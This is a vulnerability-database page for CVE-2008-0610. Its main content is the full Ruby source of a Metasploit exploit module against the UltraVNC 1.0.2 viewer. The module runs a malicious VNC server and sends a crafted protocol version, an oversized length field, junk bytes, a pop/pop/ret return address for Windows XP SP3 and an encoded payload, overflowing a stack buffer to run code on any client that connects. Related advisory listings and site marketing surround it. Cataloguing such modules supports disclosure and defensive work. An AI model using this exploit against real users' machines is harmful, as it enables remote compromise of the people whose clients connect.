Lucene search
K

UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow

🗓️ 28 Mar 2012 20:29:31Reported by noperandType 
metasploit
 metasploit
🔗 www.rapid7.com👁 42 Views

UltraVNC 1.0.2 Client Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
0day.today
UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
26 Mar 201200:00
zdt
0day.today
UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
26 Mar 201200:00
zdt
Circl
CVE-2008-0610
26 Mar 201200:00
circl
CVE
CVE-2008-0610
6 Feb 200811:00
cve
Cvelist
CVE-2008-0610
6 Feb 200811:00
cvelist
Exploit DB
UltraVNC 1.0.2 Client - 'vncviewer.exe' Remote Buffer Overflow (Metasploit)
26 Mar 201200:00
exploitdb
NVD
CVE-2008-0610
6 Feb 200812:00
nvd
Packet Storm
UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
26 Mar 201200:00
packetstorm
Prion
Stack overflow
6 Feb 200812:00
prion
Prion
Stack overflow
10 Nov 200814:12
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.

        If a malicious server responds to a client connection indicating a minor
        protocol version of 14 or 16, a 32-bit integer is subsequently read from
        the TCP stream by the client and directly provided as the trusted size for
        further reading from the TCP stream into a 1024-byte character array on
        the stack.
      },
      'Author'         => 'noperand',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0610' ],
          [ 'OSVDB', '42840' ],
          [ 'BID', '27561' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3',	{ 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-02-06',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    sploit = rand_text_alpha(1100)   	# junk, could be more efficient here
    sploit << "\x00\x04\x00\x00" 	 	# value to get around a write
    sploit << rand_text_alpha(12)	 	# random junk
    sploit << "\xEB\x06" << make_nops(2)	# short relative jump
    sploit << [target.ret].pack('V') 	# pop/pop/ret (default is in vncviewer.exe)
    sploit << payload.encoded

=begin
    We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
    - These bytes are read directly by a call to ReadExact() with a size of 12.

    ...
    if (m_minorVersion == 14 || m_minorVersion == 16)
    {
      int size;
      ReadExact((char *)&size,sizeof(int));
      char mytext[1024]; //10k
      ReadExact(mytext,size);
      mytext[size]=0;
    ...

    If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
    We then append our data.
=end
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)
    handler(client)
    service.close_client(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.6Low risk
Vulners AI Score0.6
CVSS 29.3
EPSS0.38757
42